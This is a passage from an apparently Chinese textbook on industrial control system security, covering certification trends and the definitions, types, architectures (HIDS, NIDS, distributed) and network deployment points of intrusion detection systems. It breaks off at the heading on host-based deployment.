工业控制系统信息安全已经上升为国家战略,因此工业控制系统信息安全认证尤为重 要。工业控制系统产品供应商、系统集成商、工业控制系统资产拥有单位必须认真对待产 品认证。 从工业控制系统市场发展和市场出现的来自不同认证机构的产品认证来看,工业控制 系统信息安全产品认证正逐步向准入机制和产品认证级别趋势发展。 1. 准入机制 工业控制系统信息安全事件的频繁发生及其导致的严重后果,引起各国政府和相关企业人员的高度重视,工业控制系统产品市场将出现准入机制,而产品准入机制的先决条件 是产品的信息安全认证。 目前,有些国家对工业控制系统在本国工业控制领域的应用明确提出产品信息安全认 证要求,而有些国家在项目采购方面也已经明确工业控制系统产品信息安全认证的要求, 工业控制系统资产拥有单位在新建或改造项目中也明确提出此类要求。 2. 产品认证级别趋势 从前面几节的介绍可以看出, 目前出现的产品认证机构给出的认证级别不太相同。如 何处理这个问题已经摆在我们面前。 随着工业控制系统信息安全标准体系的建立,其产品认证级别将走向互认机制或同一 机制。 (1)产品认证级别互认机制。 为了占领市场,每家认证机构的产品认证都在快速推进;工业控制系统资产拥有单位 为保持其系统产品的多种选择策略,必然会购买经不同认证机构认证的产品。因此,产品 认证级别互认机制有一定的可能性。 (2)产品认证级别统一机制。 目前,国际标准协会也认识到产品认证市场的纷繁复杂,正在组织各国专家协商此 事,努力建立一个各国广泛接受的通用标准,促进产品认证级别走向统一机制,为产品 供应商、工业控制系统资产拥有单位节约时间、人力和物力,共同实现工业控制系统的 信息安全。 第 9 章 工业控制系统入侵检测与防护 9.1 入侵检测系统与防护系统简介 工业控制系统的发展对工业控制系统信息安全提出了更高的要求。如果工业控制系统 发生入侵攻击,则可能严重威胁系统的可用性,对于工业控制系统来说可能产生人员伤 亡、环境污染等严重后果。因此,工业控制系统信息安全更需要“未雨绸缪,防患于未 然”的主动防御,将入侵攻击扼杀于萌芽中。 入侵检测系统和入侵防护系统是工业控制系统运行安全防护的两个有效手段,在工 业控制系统信息安全防护中起着举足轻重的作用,它们对工业控制系统网络传输和系统 运行过程中的入侵行为进行实时监视,在发现可疑时发出警报或触发入侵反应系统采取反 应措施。 由于工业控制系统与传统 IT 系统有一定的区别,系统的功能和结构相对稳定,通信 协议固定而有限,这使得开发符合工业控制系统特点的入侵检测与防护系统成为可能,尤 其可以克服IT 系统中基于异常行为的入侵检测系统的误报率高的缺点。 目前,工业控制系统的入侵检测与防护系统正处于理论研究和应用阶段,其发展方向 必将对工业控制系统信息安全产生深远影响。因此,对入侵检测与防护系统的知识及应用 应有一定的理解和掌握。 9.2 入侵检测系统 入侵检测的概念最早由 Anderson 于1980年提出。任何企图危害计算机或网络资源的 机密性、完整性和可用性的行为都可以称为入侵。 入侵检测 (Intrusion Detection,ID), 顾名思义,是对入侵行为的发觉,并对此做出 反应的过程。通过对工业控制系统的设备或网络中的若干关键点收集信息并对其进行分 析,从中发现工业控制系统设备或网络系统中是否有违反安全策略的行为和被攻击的迹 象,根据分析和检查的情况,做出相应响应(告警、记录、中止等)。入侵检测在工业控 制系统信息安全架构中位于防护线之后,作为第二道防线,及时发现入侵和破坏行为,合 理弥补静态防护技术的不足,减轻工业控制系统安全事件带来的损失。 9.2.1 入侵检测系统的定义 入侵检测技术是一种主动保护自己的网络和系统免遭非法攻击的网络安全技术,它从计 算机系统或网络中收集、分析信息,检测任何企图破坏计算机资源的完整性 (Integrity)、机 密性 (Confidentiality) 和可用性 (Availability) 的行为,即查看是否有违反安全策略的行 为和遭到攻击的迹象,并做出相应的反应。 根据国际计算机安全协会 (ICSA) 的定义,入侵检测是通过从计算机网络或计算机 系统中的若干关键点收集信息并对其进行分析,从中发现网络或系统中是否有违反安全策 略的行为和遭到袭击的迹象的一种安全技术。违反安全策略的行为通常包括两种:入侵, 即非法用户的违规行为;误用,即用户的违规行为。 入侵检测系统 (Intrusion Detection System,IDS)是可以实现入侵检测功能的独立系 统,是一个软硬件的组合体,能够检测未授权对象(人或程序)针对系统的入侵企图或行 为,同时监控授权对象对系统资源的非法操作。 9.2.2 入侵检测系统的功能 入侵检测系统的应用:能够在入侵攻击对系统产生危害前检测到入侵攻击,并利用报 警与防护系统驱逐入侵攻击;在入侵攻击过程中,能减少入侵攻击所造成的损失;在被入 侵攻击后,收集入侵攻击的相关信息,作为防范系统的知识添加到知识库内,以增强系统 的防范能力。 入侵检测系统的功能如图9-1 所示,其主要功能介绍如下。 图9-1 入侵检测系统的功能 1. 监测、分析用户和系统的活动 监测、分析用户和系统的活动是入侵检测系统能够完成入侵检测任务的前提条件。 入侵检测系统通过获取进、出某台主机或整个网络的数据,或者通过查看主机日志等 信息来实现对用户和系统活动的监控。通常,获取网络数据的方法是“抓包”,即将数据流中的所有包截获并进行分析。因此,对入侵检测系统的效率提出了较高要求。如果入侵 检测系统不能实时地截获数据包并对它们进行分析,那么就会出现漏包或网络阻塞现象。 如果是前一种情况,系统漏报就会很多;如果是后一种情况,就会影响入侵检测系统所在 主机或网络的数据流速,使得入侵检测系统成为整个系统的瓶颈,这显然是我们不愿看到 的结果。因此,入侵检测系统不仅要能够监控、分析用户和系统的活动,还要使这些操作 足够快。 2. 发现入侵企图或异常现象 发现入侵企图或异常现象是入侵检测系统的核心功能。 这种核心功能主要包括两个方面: 一方面是入侵检测系统对进出网络或主机的数据流 进行监控,看是否存在对系统的入侵行为;另一方面是评估系统关键资源和数据文件的完 整性,看系统是否已经遭受入侵。前者的作用是在入侵行为发生时及时发现,从而避免系 统遭受攻击,而后者一般是系统在遭到入侵时没能及时发现和阻止,攻击行为已经发生, 但可以通过攻击行为留下的痕迹了解攻击行为的一些情况,从而避免再次遭受攻击。对系 统资源完整性的检查也有利于对攻击者进行追踪,并对攻击行为进行取证。 网络数据流的监控可以使用异常检测的方法,也可以使用误用检测的方法,目前已提 出了很多新技术,但多数还在理论研究阶段,入侵检测产品使用的主要是模式匹配技术。 这些检测技术的好坏直接关系到系统能否精确地检测出攻击,因此,对于这方面的研究是 IDS 研究领域的主要工作。 3. 记录、报警和响应 记录、报警和响应是入侵检测系统必然具备的功能。 入侵检测系统在检测到攻击后,应该采取相应的措施来阻止攻击或响应攻击。入侵检 测系统作为一种主动防御策略,必然应该具备此功能。入侵检测系统应该首先记录攻击的 基本情况,其次应该能够及时发出报警。 一个好的入侵检测系统,不仅能把相关数据记录 在文件或数据库中,还应该提供好的报表打印功能。必要时,系统还应该采取响应行为, 如拒绝接收所有来自某台计算机的数据、追踪入侵行为等。此外,实现与防火墙等安全部 件的响应互动也是入侵检测系统需要研究和完善的功能之一。 当然, 一个好的入侵检测系统,除了具备以上主要功能外,还可以包括其他一些功 能,如核查系统配置和漏洞、评估关键系统和数据文件的完整性等。另外,入侵检测系统 应该为管理员和用户提供友好易用的界面,方便管理员设置用户权限、管理数据库、手工 设置和修改规则、处理报警及浏览、打印数据等。 9.2.3 入侵检测系统的分类 随着入侵检测技术的不断发展,目前出现了很多入侵检测系统,不同的入侵检测系统 具有不同的特征。按照不同的分类标准,入侵检测系统可分为不同类别。对于入侵检测系 统,需要考虑的因素(分类依据)主要有信息源、入侵、事件生成、事件处理、检测方法等。基于不同的分类依据及分类结果,下面将对入侵检测系统分类进行介绍。 1. 按照原始数据的来源分类 按照原始数据的来源分类,入侵检测系统可以分为基于主机的入侵检测系统、基于网络 的入侵检测系统和基于应用的入侵检测系统。入侵检测系统要对其所监控的网络或主机的当 前状态做出判断,并不是凭空臆测,它需要以原始数据中包含的信息为基础做出判断。 其中,基于主机的 IDS 和基于网络的 IDS 作为不同体系结构的 IDS, 将在9.2.5节中进 一步介绍。 2. 按照检测原理分类 按照检测原理分类是传统的观点,即根据入侵行为的属性将其分为异常和误用两种, 分别对其建立异常检测模型和误用检测模型。 异常入侵检测是指能够根据异常行为和使用计算机资源的情况来检测入侵。异常入侵 检测试图用定量的方式描述可以接受的行为特征,以区分非正常的、潜在的入侵行为。 误用入侵检测是指利用已知系统和应用软件的弱点攻击模式来检测入侵。 IDS 异常检测和误用检测的原理请参考相关资料,在此不做详细介绍。 3. 按照体系结构分类 按照体系结构分类, IDS 可分为集中式、等级式和协作式三种。 集中式IDS 可能有多个分布于不同主机上的审计程序,但只有一个中央入侵检测服务 器。审计程序把从当地收集到的数据踪迹发送给中央服务器进行分析处理。因此,这种结 构的IDS 在可伸缩性、可配置性方面存在致命缺陷。随着网络规模的增加,主机审计程序 和服务器之间传送的数据量会骤增,导致网络性能大大降低,并且当中央服务器出现故障 时,整个系统会陷入瘫痪。基于各个主机的不同需求,服务器的配置也是非常复杂的。 等级式 IDS, 又称为部分分布式 IDS, 定义了若干个分等级的监控区域,每个 IDS 负 责一个区域,每一级IDS 只负责所监控区域的分析,然后将当地的分析结果传送给上一级 IDS 。这种结构也存在一些问题:当网络拓扑结构改变时,区域分析结果的汇总机制也需 要做出相应调整;此外,这种结构的IDS 最后还是要把从各地收集到的结果传送到最高级 的检测服务器进行全局分析,所以系统的安全性并没有实质性改进。 协作式 IDS, 又称为分布式 IDS, 可将中央检测服务器的任务分配给多个基于主机的 IDS, 这 些 IDS 不分等级,各司其职,负责监控当地主机的某些活动。因此,这种 IDS 的 可伸缩性、安全性都得到了显著提高,但其维护成本也高了很多,并且增加了所监控主机 的工作负荷,如通信机制、审计开销、踪迹分析等。 4. 按照工作方式分类 按照工作方式分类,入侵检测系统可分为离线检测系统和在线检测系统两种。 离线检测系统是一种非实时工作的系统,在事件发生后分析审计事件,从中检查入侵 事件。这类系统的成本低,可以分析大量事件,调查事件情况。但由于是在事后进行,所以不能对系统提供及时保护,并且很多入侵在完成后都将审计事件去掉,使其无法审计。 在线检测系统对网络数据包或主机的审计事件进行实时分析,可以快速反应,保护系 统的安全,但在系统规模较大时难以保证实时性。 通过这些不同的分类方法,可以从不同的角度了解入侵检测系统,认识入侵检测系统 所具有的不同功能,但对实际的入侵检测系统而言,基于实用性的考虑,经常要综合采用 多种技术,并具备多种功能,因此,很难将一个实际的入侵检测系统归于某一类。它们通 常是这些类别的混合体,某个类别只是反映了这些系统的一个侧面而已。 9.2.4 入侵检测系统的不足 入侵检测系统经过十几年的发展,在信息管理系统中应用较多,在工业控制系统中的 应用也在开发中。 目前,入侵检测系统主要存在以下不足: (1)IDS 本身还在迅速发展和变化,远未成熟。 绝大多数商业 IDS 的工作原理和病毒检测相似,自身带有一定规模和数量的入侵特征 模式库,可以定期更新。这种工作方式存在很多弱点:不灵活,仅对已知的攻击手段有 效;特征模式库的提取和更新依赖于手工方式,维护不易;具有自适应能力、能自我学习 的 IDS 还远未成熟,检测技术在理论上还有待突破。因此, IDS 领域当前正处于不断发育 成长的幼年时期。 (2)事件响应与恢复机制不完善。 这部分对 IDS 非常重要,而目前几乎都被忽略,并没有一个完善的响应恢复体系,远 不能满足人们的期望和要求。 (3)IDS 与其他安全技术的协作性不够。 目前,网络系统中往往采用很多其他安全技术,如防火墙、身份认证系统、网络管理 系统等,它们之间能够相互沟通、相互配合,对IDS 进一步增强自身的检测和适应能力是 有帮助的,但协作性方面还需加强。 (4)现有IDS 的虚警率偏高。 虚警率(也就是错报率)偏高,严重干扰了检测结果。如果IDS 对原本不是攻击的事 件产生了错误警报,则将错误警报称为虚警 (False Positive)。通常这些错报会干扰管理 员的注意力,进而产生两种后果:忽略警报,但这样做的结果与安装IDS 的初衷相背;重 新调整临界阈值,使系统对虚报的事件不再敏感,但这样做之后一旦有真的相关攻击事件 发生,IDS 将不再报警,同样损失了IDS 的功效。 (5)IDS 的规范和标准化有待建立。 目前,还没有关于描述入侵过程和提取攻击模式的统一规范,没有关于检测和响应模 型的统一描述语言,检测引擎的处理也没有标准化。 互联网工程任务组 (The Internet Engineering Task Force,IETF) 的入侵检测工作 组 IDWG 正在制定这些标准, 提出的建议草案包括三部分内容:入侵检测消息交换格 式 (IDMEF)、 入侵检测交换协议 (IDXP) 及隧道轮廓 (Tunnel Profile)。 9.2.5 入侵检测系统的体系结构 入侵检测系统的体系结构分为基于主机的 IDS 结构、基于网络的 IDS 结构和分布式 IDS 结构。基于主机的 IDS 结构与基于网络的 IDS 结构体现了 IDS 不同的体系结构,分 布式 IDS 结构能够较好地融合前两者的优点,下面分别对它们进行介绍。 1. 基于主机的入侵检测系统 (HIDS) 结 构 1)HIDS 结构的定义 基于主机的入侵检测系统 (Host-based IDS,HIDS) 的检测目标主要是主机系统和本 地用户。对 HIDS 结构做一个确切定义:基于主机的入侵检测系统就是安装在单个主机或 服务器系统上,对针对主机或服务器系统的入侵行为进行检测和响应,对主机系统进行全 面保护的系统。 HIDS 的检测原理是在每个需要保护的端系统(主机)上运行代理程序 (Agent), 以 主机的审计数据、系统日志、应用程序日志等为数据源,主要对主机的网络进行实时连接 及对主机文件进行分析和判断,发现可疑事件并做出响应。 HIDS 结构出现在20 世 纪 8 0 年代初期,那时网络还没有今天这样普遍、复杂,并且 网络之间也没有完全连通。在这种较为简单的环境里,检查可疑行为的检验记录是很常见 的操作。由于入侵在当时是相当少见的,所以对攻击的事后分析就可以防止今后的攻击。 HIDS 主要是对该主机的网络连接行为及系统审计日志进行智能分析和判断。如果其 中主体活动十分可疑,入侵检测系统就会采取相应措施。作为对主机系统的全面防护,主 机入侵检测通常包括网络监控和主机监控两个方面。 2)HIDS 结构的模型 基于主机的入侵检测系统模型如图9-2 所示。数据收集装置负责收集反映状态信息的 审计数据,然后传给检测分析器完成入侵分析,并发出告警信息。知识库为入侵检测提供 必需的数据支持。控制台根据告警信息做出响应动作。 图9-2 基于主机的入侵检测系统模型 3)HIDS 结构的优点 HIDS 在发展过程中融入了其他技术。对关键系统文件和可执行文件入侵检测的一个 常用方法是通过定期检查校验和来进行,以便发现意外变化。反应的快慢与轮询间隔的频率有直接关系。另外,许多产品都是监听端口的活动,并在特定端口被访问时向管理员报 警。这类检测方法将基于网络入侵检测的基本方法融入基于主机的检测环境中。尽管基于 主机的入侵检测系统不如基于网络的入侵检测系统快捷,但它确实具有基于网络的入侵检 测系统无法比拟的优点。这些优点包括以下几点。 (1)性价比高。 在主机数量较少的情况下,这种方法的性价比可能更高。尽管基于网络的入侵检测系统 能很容易地提供广泛覆盖,但其价格通常是昂贵的,配置一个基于网络的入侵检测系统要花 费10000 美元以上,而主机入侵检测系统标价仅几百美元,并且客户只需支付很少的费 用用于最初安装。 (2)对网络流量不敏感。 用代理的方式一般不会因为网络流量的增加而丢掉对网络行为的监视。 (3)更加细腻。 这种方法可以很容易地检测一些活动,如对敏感文件、目录、程序或端口的存取,而 这些活动很难在基于网络的入侵检测系统中被发现。HIDS 监视用户和文件访问活动,包 括文件访问、改变文件权限、试图建立新的可执行文件并且/或者试图访问特许服务。例 如,HIDS 可以监督所有用户登录及退出登录的情况,以及每位用户在连接到网络以后的 行为。基于网络的入侵检测系统要做到这个程度是非常困难的。基于主机技术还可监视通 常只有管理员才能实施的非正常行为。操作系统记录了任何有关用户账号的添加、删除及 更改情况。 一旦发生了更改, HIDS 就能检测到这种不适当的更改。HIDS 还可审计能影 响系统记录的校验措施的改变。最后,基于主机的入侵检测系统可以监视关键系统文件和 可执行文件的更改,能够检测到那些欲重写关键系统文件或安装特洛伊木马或后门的尝 试,并将它们中断;而基于网络的入侵检测系统有时会检测不到这些行为。 (4)易于用户剪裁。 每一个主机都有其自己的代理,当然用户剪裁更方便了。 (5)较少的主机。 有时,基于主机的方法不需要增加专门的硬件平台。基于主机的入侵检测系统存在于 现有的网络结构之中,包括文件服务器、Web 服务器及其他共享资源。这些使得基于主机 的系统效率很高,因为它们不需要在网络上另外安装登记、维护及管理的硬件设备。 (6)适用于被加密及交换的环境。 由于基于主机的系统安装在遍布企业的各种主机上,它们比基于网络的入侵检测系统 更加适用于交换及加密的环境。交换设备可将大型网络分成许多小型网络段加以管理,所 以从覆盖足够大的网络范围的角度出发,很难确定配置基于网络的IDS 的最佳位置。业务 镜像和交换机上的管理端口对此有帮助,但这些技术有时并不适用。基于主机的入侵检测 系统可安装在所需的重要主机上,在交换的环境中具有更高的能见度。某些加密方式也向 基于网络的入侵检测系统发出了挑战。根据加密方式在协议堆栈中位置的不同,基于网络 的 IDS 可能对某些攻击没有反应。基于主机的 IDS 没有这方面限制。当操作系统及基于 主机的 IDS 发现即将到来的业务时,数据流已经被解密了。 (7)视野集中。一旦代理主机的用户名和口令被攻破,则基于主机的代理是最有可能区分正常活动和 非法活动的。 (8)确定攻击是否成功。 由于 HIDS 使用含有已发生事件的信息,它们可以比基于网络的 IDS 更加准确地判断 攻击是否成功。在这方面, HIDS 是基于网络的 IDS 的完美补充,网络部分可以尽早提供 告警,主机部分可以确定攻击成功与否。 4)HIDS 结构的弱点 HIDS 依赖于审计数据或系统日志的准确性和完整性,在一定程度上还依赖于系统的 可靠性及合理的设置,但是对于熟悉操作系统的攻击者来说,仍然可能设法逃避审计(使 用某些系统特权或调用比审计本身更低的操作等),在入侵行为完成后及时修改系统日 志,从而不被发现。另外,主机日志能够提供的信息是有限的,不可能在日志中反映出所 有的入侵手段和途径。这些弱点使 HIDS 在网络环境下显得难以适应安全的需求。HIDS 必须部署在被保护的主机上,占用主机资源,或多或少地影响系统效率。HIDS 除了检测 自身的主机以外,不能检测网络上的情况,也不能通过发现审计记录来检测网络攻击,如 端口扫描、域名欺骗等。 2. 基于网络的入侵检测系统 (NIDS) 结构 1)NIDS 结构的定义 基于网络的入侵检测系统 (Network-based IDS,NIDS) 的检测目标主要是受保护的整 个网络段。其检测原理是在受保护的网络段安装感应器 (Sensor) 或检测引擎 (Engine), 通常是利用一个运行在混杂模式下的网络适配器来实时监视并分析通过网络的所有数 据包。 因此,网络入侵检测利用一个运行在混杂模式下网络的适配器来实时监视并分析通过 网络的所有通信业务。网络入侵检测使用原始网络包作为数据源,它的攻击辨识模块通常 使用四种常用技术来识别攻击标志:模式、表达式或字节匹配、频率或穿越阈值、次要事 件的相关性和统计学意义上的非常规现象检测。 一旦检测到了攻击行为, IDS 的响应模块就提供多种选项以通知、报警并对攻击采取 相应的反应,其反应因产品而异,但通常包括通知管理员、中断连接,或者为法庭分析和 收集证据而做的会话记录。 网络入侵检测有许多仅靠基于主机的入侵检测无法提供的功能。实际上,许多客户在 最初使用IDS 时,都配置了基于网络的入侵检测系统。 2)NIDS 结构的模型 基于网络的入侵检测系统模型如图9-3 所示。嗅探器的功能是按一定规则从网络段上 获取相关数据包,然后传递给检测引擎,检测引擎将接收到的数据包结合攻击模式库进行 分析,将分析结果传送给管理/配置器, 一方面触发响应,另一方面管理/配置器把检测引 擎的结果构造为嗅探器所需的规则。 3)NIDS 结构的优点 基于网络的入侵检测系统有以下优点。 图9-3 基于网络的入侵检测系统模型 (1)视野更宽。 基于网络的入侵检测甚至可以在网络的边缘上,即攻击者还没能接入网络时就被发现 并制止。 (2)侦测速度快。 基于网络的监测器通常能在微秒或秒级发现问题,而大多数基于主机的产品要依靠对 最近几分钟内审计记录的分析才能发现问题。 (3)较少的监测器。 由于使用一个监测器就可以保护一个共享网络段,所以不需要很多监测器。相反,如 果基于主机,则在每个主机上都需要一个代理,花费昂贵,并且难以管理,但是如果在一 个交换环境下,则需要特殊的配置。 (4)攻击者不易转移证据。 NIDS 使用正在发生的网络通信进行实时攻击检测,所以攻击者无法转移证据。被捕 获的数据不仅包括攻击的方法,而且包括可识别黑客身份和对其进行起诉的信息。许多黑 客都熟知审计记录,他们知道如何操纵这些文件掩盖其作案痕迹,如何阻止需要这些信息 的基于主机的入侵检测系统去检测入侵。 (5)操作系统无关性。 NIDS 作为安全检测资源,与主机的操作系统无关。与之相比,基于主机的入侵检测 系统必须在特定的、没有遭到破坏的操作系统中才能正常工作,生成有用的结果。 (6)占用资源少。 在被保护的设备上不用占用任何资源。 (7)隐蔽性好。 一个网络上的监视器不像一个主机那样明显和易被存取,因而也不那么容易遭受攻 击。基于网络的监视器不运行其他应用程序,不提供网络服务,可以不响应其他计算机, 因此可以做得比较安全。 4)NIDS 结构的弱点 基于网络的入侵检测系统存在一些弱点,主要有: 第9章工业控制系统入侵检测与防护 (1)基于网络的入侵检测系统仅检查与它直接连接网络段的通信,不能检测在不同 网络段的网络包。 (2)在使用交换以太网的环境中会出现检测范围的局限。 (3)安装多台网络入侵检测系统的传感器,使部署整个系统的成本大大增加。 (4)为了性能目标,基于网络的入侵检测系统通常采用特征检测的方法,它可以检测 出一些普通的攻击,但很难实现一些复杂的、需要大量计算与分析时间的攻击检测。 (5)基于网络的入侵检测系统可能会将大量数据传回分析系统,在一些系统中监听特 定的数据包会产生大量的分析数据流量。 一些系统在实现时采用一定的方法来减少回传的 数据量,对入侵判断的决策由传感器实现,而中央控制台成为状态显示与通信中心,不再 作为入侵行为分析器。这样系统中的传感器协同工作能力较弱。 此外,基于网络的入侵检测系统处理加密的会话过程比较困难,目前通过加密通道的 攻击尚不多,但随着 IPv6 的普及,这个问题会越来越突出。 3. 分布式入侵检测系统 (DIDS) 结构 1)DIDS 结构的定义 基于主机的入侵检测系统和基于网络的入侵检测系统各有自己的优缺点。联合使用基 于主机和基于网络这两种方式能够达到更好的检测效果。例如, HIDS 使用系统日志作为 检测依据,因此,它在确定攻击是否已经取得成功时与 NIDS 相比具有更高的准确性。在 这方面, HIDS 对 NIDS 是一个很好的补充,人们完全可以使用 NIDS 提供早期报警,而 使用 HIDS 来验证攻击是否取得成功,这实际上就是混合入侵检测系统的概念,分布式入 侵检测系统 (Distributed Intrusion Detection System,DIDS) 结构可以是混合入侵检测系统 的一种,也可以仅是NIDS 的分布式整合。 分布式入侵检测系统一般指的是部署于大规模网络环境下的入侵检测系统,其任务是 监视整个网络环境中的安全状态,包括网络设施本身和其中包含的主机系统。 2)DIDS 结构的模型 传统的集中式入侵检测技术的基本模型是在网络的不同网络段中放置多个传感器或探 测器来收集当前网络状态的信息,然后将这些信息传送到中央控制台进行处理和分析。或 者更进一步的情况是,这些传感器具有某种主动性,能够接收中央控制台的某些命令和下 载某些识别模板等。 传统的集中式模型存在几个明显缺陷。首先,面对在大规模、异质网络基础上发起的 复杂攻击行为,中央控制台的业务负荷将会达到不可承受的地步,以至于没有足够的能力 处理来自四面八方的消息事件,这种情况会造成对许多重大消息事件的遗漏,大大增加漏 警率。其次,由于网络传输的时延问题(在大规模异质网络中尤其如此),到达中央控制 台的数据包中的消息事件只是反映了它刚被生成时的环境状态情况,已经不能反映可能随 着时间已经改变的当前状态。这将使得基于过时信息做出的判断的可信度大大降低,同时也 使得返回去确认相关信息来源变得非常困难。异质网络环境所带来的平台差异性也将给集中 式模型带来诸多困难。因为每种攻击行为在不同的平台操作环境中都表现出不同类型的模式特征,而已知的攻击方法数目非常之多,所以,在集中式模型的系统中,想要进行较为 完全的攻击模式的匹配就已经非常困难,更何况还要面对不断出现的新型攻击手段。 面 对 这 些 难 题 , 许 多 新 的 思 路 已 经 出 现 , 其 中 一 种 就 是 攻 击 策 略 分 析 (Attack Strategy Analysis) 方法。它采用了分布式智能代理的结构方式,由几个中央智能代理和大 量分布的本地代理组成,其中本地代理负责处理本地事件,而中央代理负责整体的分析工 作。与集中式模型不同,它强调的是通过全体智能代理协同工作来分析入侵者的攻击策 略,中央代理扮演的是协调者和全局分析员的角色,但绝不是唯一的事件处理者,其地位 有点类似于战场上的元帅,根据对全局形式的判断指挥部下开展行动。本地代理有较强的 自主性,可以独立对本地攻击进行有效检测;同时,它也与中央智能代理和其他本地代理 通信,这种方法有明显优势,同时接受中央智能代理的调度指挥并与其他代理协同工作, 但同时带来了其他一些问题,如大量代理的组织和协作、相互之间的通信、处理能力和分 析任务的分配等。 一个典型的分布式入侵检测系统框图如图9-4 所示。系统中的部件是具有特定功能的 独立应用程序、小型的系统或仅仅是一个非独立的应用程序的功能模块。部署时,这些部 件可能在同一台计算机上,也可以各自分布在一个大型网络的不同地点,能够完成某一特 定的功能。部件之间通过统一的网络接口进行信息交换,既简化了部件之间数据交换的复 杂性,使部件非常容易地分布在不同主机上,也给系统提供了一个扩展接口。 图9-4 分布式入侵检测系统框图 系统的主要部件包括网络引擎 (Network Engine)、主机代理 (Host Agent)、存储系统 (Storage System)、分 析 系 统 (Analyzers) 、 响 应 系 统 (Response System)、控 制 台 (Manager Console)。 网络引擎和主机代理属于互联网工程任务组 (IETF) 的通用入侵检测框架工作组 (CIDF) 中的事件产生器 (Event Generators) 。网络引擎截获网络中的原始数据包,并 从中寻找可能的入侵信息或其他敏感信息。主机代理在所在主机以各种方法收集信息, 包括分析日志、监视用户行为、分析系统调用、分析该主机的网络通信等,但网络引擎 和主机代理也具有数据分析功能,对于已知的攻击,在这些部件中用模式匹配的方法来 检测可以大大提高系统的处理速度,同时可以减小分析部件的工作量及系统网络传输的 影响。 存储系统的作用是用于存储事件产生器捕获的原始数据、分析结果等。存储的原始数 据在对入侵者进行法律制裁时提供确凿的证据。存储系统也是不同部件之间数据处理的共享数据库,可以为系统不同部件提供各自感兴趣的数据。因此,存储系统应该提供灵活的 数据维护、处理和查询服务,同时也是一个安全的日志系统。 分析系统是对事件发生器捕获的原始信息、其他入侵检测系统提供的可疑信息进行统 一分析和处理的系统。 响应系统是对确认的入侵行为采取相应措施的子系统。响应包括消极的措施,如给管 理员发电子邮件、消息、传呼等;也可以采取保护性措施,如切断入侵者的 TCP 连接、 修改路由器的访问控制策略等;也可以采取主动的反击策略,对攻击者进行如 DoS 等攻 击,但这种以毒攻毒的方法在法律上是不许可的。 控制台是整个入侵检测系统和用户交互的界面。用户可以提供控制台配置系统中的各 个部件,也可以通过控制台了解各部件的运行情况。 3)DIDS 结构的优点 DIDS 结构的优点:可以进行多点监控,克服检测单一网络出入口的弱点;可以将日 志统一管理,协同工作分析,更易于分析网络中的安全事件;全局预警控制可以保证各个 控制中心一处发现异常,全网进行戒备,有效阻断攻击。 4)DIDS 结构的弱点 目前,入侵检测系统一般采用集中模式,这种模式的缺点是难以及时对在复杂网络上 发起的分布式攻击进行数据分析以至于无法完成检测任务,入侵检测系统本身所在的主机 还可能面临因负荷重而崩溃的危险。此外,随着网络攻击方法的日趋复杂,单一的检测方 法难以获得令人满意的检测效果。另外,在大型网络中,网络的不同部分可能分别采用不 同的入侵检测系统,各系统之间通常不能互相协作,这样不仅不利于检测工作,甚至还会 产生新的安全漏洞。对于这些问题,采用分布式结构的入侵检测模式是解决方案之一,也 是目前入侵检测技术的研究方向。这种模式的系统采用分布式智能代理的结构,由一个或 多个中央智能代理和大量分布在网络各处的本地代理组成。本地代理负责处理本地事件, 中央代理负责统一调控各地代理的工作,以及从整体上完成对网络事件进行综合分析的工 作。检测工作通过全部代理互相协作完成。 9.2.6 入侵检测系统的部署 1.IDS 的一般部署 与防火墙不同,IDS 是一个监听设备,没有挂接在任何链路上,无须网络流量流经它 便可以工作,因此,对 IDS 部署的唯一要求是 IDS 应当挂接在所有所关注流量都必须流 经的链路上。在这里,“所关注流量”指的是来自高危网络区域的访问流量和需要进行统 计、监视的网络报文。在如今的网络拓扑中,已经很难找到以前的 HUB 式的共享介质冲 突域网络,绝大部分的网络区域已经全面升级到交换式网络结构。 因此, IDS 在交换式网络中的位置一般选择在尽可能靠近攻击源及受保护资源。这些 位置通常在服务器区域的交换机上、Internet 接入路由器之后的第一台交换机上或重点保 护网段的局域网交换机上。入侵检测系统的典型部署方式如图9-5所示。 2.NIDS 的 部 署 基于网络的入侵检测系统可以在网络的多个位置进行部署,这些部署主要是指对网络 入侵检测器的部署。根据检测器部署位置的不同, NIDS 具有不同的工作特点。用户需要 根据自己的网络环境及安全需求确定具体的部署方式。总体来说,入侵检测的部署点可以 分为四个位置: DMZ 区域、外网入口、内网主干和关键子网。 (1)DMZ 区域。 DMZ 区域是为了解决安装防火墙后外部网络不能访问内部网络服务器的问题而设立 的一个非安全系统与安全系统之间的缓冲区,这个缓冲区位于企业内部网络和外部网络之 间的小网络区域内,在这个小网络区域内可以放置一些必须公开的服务器设施,如企业 Web 服务器、FTP 服务器、PIMS 服务器、维修服务器和中继服务器等。 DMZ 区域的部署点在 DMZ 区域的总入口上,这是 IDS 最常见的部署位置。在这 里,入侵检测系统可以检测到所有针对向外提供服务的服务器进行攻击的行为。对于企业 用 户 来 说 , 防 止 对 外 服 务 的 服 务 器 受 到 攻 击 是 极 为 重 要 的 。 由 于 DMZ 区域中的各个服 务器是提供对外服务的且这些服务器是外网可见的,因此,在这里部署IDS 是非常重要的。 (2)外网入口。 外网入口部署点在防火墙之前, IDS 在这个部署点上可以检测出所有进出防火墙外网 口的数据。入侵检测器可以检测到所有来自外部网络的可能攻击行为并进行记录,这些攻 击包括对内部服务器的攻击、对防火墙的攻击及与内部网络的一切异常数据通信的行为。 这种部署方式对整体入侵行为的检测记录有帮助,但由于入侵检测器本身性能的局 限,这种部署方式的实际效果并不理想,同时对于进行 NAT 的内部网络来说,入侵检测 不能定位攻击的源地址或目的地址,系统管理员在处理攻击行为上存在一定难度。 (3)内网主干。 内网主干部署点是最常用的部署位置,在这里入侵检测器主要检测内网流出和经过防 火墙过滤后流入内网的网络数据。在这个部署点上,入侵检测器可以检测所有通过防火墙 过滤后的攻击及内部网络向外的异常网络通信,并且可以准确定位攻击的源地址和目的地 址,方便系统管理员对记录信息的审计处理。 由于防火墙的过滤作用,已经根据规则抛弃了大量非法数据包,从而降低了通过 IDS 的数据流量,使入侵检测器能够更有效地工作。当然,由于入侵检测器在防火墙的内部, 防火墙也阻断了部分攻击行为,所以入侵检测器不能记录所有可能的攻击行为。 (4)关键子网。 在内部网络中会出现一些子网因为存放关键的数据和服务,而需要更加严格的安全控 制,如企业网络中的数据中心子网、工业控制系统子网等。在关键子网外部署 IDS, 可以 检测到来自内部和外部所有针对关键子网的非法网络行为,这样可以有效地保护关键子网 不会被外部或内部没有足够访问权限的用户入侵,避免关键数据信息的泄露或破坏。由于 关键子网位于内部网络中,因此,流量相对较小,可以保障入侵检测器的有效检测。 3.HIDS 的部署 